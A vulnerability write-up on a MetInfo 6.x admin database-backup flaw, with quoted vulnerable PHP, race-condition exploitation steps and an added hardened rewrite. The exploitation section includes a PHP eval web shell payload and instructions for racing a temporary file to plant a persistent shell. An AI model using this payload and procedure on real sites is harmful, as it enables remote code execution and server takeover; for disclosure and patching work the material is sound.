MetInfo 6.x backend getshell (race condition)

Description: An issue was discovered in MetInfo 6.x. A logged-in administrator can abuse the backend database backup function to obtain a web shell.

1. Technical Description:

Located in /app/system/databack/admin/index.class.php, lines 456 to 478:

  public function dogetsql($table='') {
      global $_M;
      // 'tables' is taken straight from the request; its content is never validated
      if($_M['form']['tables'] && !$table)$table = $_M['form']['tables'];
      $fileid = isset($_M['form']['fileid']) ? $_M['form']['fileid'] : 1;
      $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
      // ... (lines omitted in the original excerpt)
      // the user-supplied value is written into a .php file under the web root
      $this->docache_write('bakup_tables.php', $tables);

If we post a string in the `tables` parameter, the program passes it to docache_write(), located at lines 334 to 351:

  function docache_write($file, $string, $type = 'array'){
      global $_M;
      $type = strtolower($type);
      if($type == 'array') {
          // the value is turned into PHP source with var_export()
          $string = "<?php\n return ".var_export($string,TRUE).";\n?>";
      } elseif($type == 'constant') {
          foreach($string as $key => $value) $data .= "define('".strtoupper($key)."','".addslashes($value)."');\n";
          $string = "<?php\n".$data."\n?>";
      }
      // the result is written as a .php file inside the web-served admin directory
      file_put_contents(PATH_WEB.ADMIN_FILE.'/databack/'.$file, $string);
  }

This creates a file named bakup_tables.php in /admin/databack/ whose content we control. However, at the end of dogetsql() the program deletes the temporary file again:

	$this->docache_delete('bakup_tables.php', $tables);

So the file only exists for the short interval between the write and the delete, and we need a race condition: request /admin/databack/bakup_tables.php repeatedly while the backup request is being processed, so that our code runs before the file is removed. Before relying on a particular payload, check on a test install what actually lands on disk: in the array branch the value goes through var_export(), so the file is PHP source built from the input rather than a verbatim copy of it.


Build a test site with the latest version and, after the administrator has logged in, open in Google Chrome the request that triggers dogetsql(), with the `tables` parameter set to `<?php eval($_GET[2]);?>` and `fileid=1`.

At the same time, race it: keep requesting the temporary file /admin/databack/bakup_tables.php with parameter `2` set to PHP that writes a persistent file next to it. The payload used here ends in `'info.php','<?php%20phpinfo();?>');`.

Once a request hits the window, the persistent file /admin/databack/info.php exists and serves phpinfo(); any other PHP can be dropped the same way, which gives us the shell.
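The following is an added example, not MetInfo's code, showing a hardened form of the dogetsql()/docache_write() pattern above. It assumes a cache directory outside the web root (the constant `CACHE_DIR` here), a `mysqli` connection, and that only the list of selected table names needs to be persisted; none of these assumptions come from the original report.

```php
<?php
// Added example, not taken from MetInfo. Assumed: CACHE_DIR is a directory
// the web server never serves, and $db is an open mysqli connection.
const CACHE_DIR = '/var/lib/metinfo/cache';

// Tables that really exist, so the request can only pick among them and
// never supply arbitrary content of its own.
function existing_tables(mysqli $db): array {
    $tables = [];
    $res = $db->query('SHOW TABLES');
    if ($res === false) {
        throw new RuntimeException('SHOW TABLES failed: ' . $db->error);
    }
    while ($row = $res->fetch_row()) {
        $tables[] = $row[0];
    }
    return $tables;
}

// Validate the attacker-reachable "tables" parameter: a comma-separated list
// of plain identifiers, each of which must be a known table.
function validate_tables(string $input, array $known): array {
    $out = [];
    foreach (explode(',', $input) as $name) {
        $name = trim($name);
        if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $name)) {
            throw new InvalidArgumentException('bad table name: ' . $name);
        }
        if (!in_array($name, $known, true)) {
            throw new InvalidArgumentException('unknown table: ' . $name);
        }
        $out[] = $name;
    }
    return $out;
}

// Persist state as JSON (never as PHP) outside the web root. The file name is
// fixed by the caller and checked anyway; the write is an atomic rename so no
// half-written file is ever observable, and nothing written here can execute.
function cache_write(string $name, array $data): void {
    if (!preg_match('/^[A-Za-z0-9_]+\.json$/', $name)) {
        throw new InvalidArgumentException('bad cache name');
    }
    $path = CACHE_DIR . '/' . $name;
    $tmp  = $path . '.' . bin2hex(random_bytes(8));
    file_put_contents($tmp, json_encode($data, JSON_THROW_ON_ERROR), LOCK_EX);
    rename($tmp, $path);
}

function cache_read(string $name): array {
    $raw = @file_get_contents(CACHE_DIR . '/' . $name);
    return $raw === false ? [] : json_decode($raw, true, 512, JSON_THROW_ON_ERROR);
}

function cache_delete(string $name): void {
    @unlink(CACHE_DIR . '/' . $name);
}

// Hardened counterpart of the start of dogetsql(): the request can select
// tables, but it cannot choose what ends up on disk or where.
function dogetsql_safe(mysqli $db, array $form): array {
    $tables = validate_tables($form['tables'] ?? '', existing_tables($db));
    cache_write('bakup_tables.json', $tables);
    return $tables;
}
```

Each property removes one link in the chain: input is checked against the tables that actually exist, the state file is JSON rather than PHP, it lives where the web server cannot serve it, and the write is atomic. With that, the interval between write and delete no longer gives an attacker anything to execute, so the race is worthless.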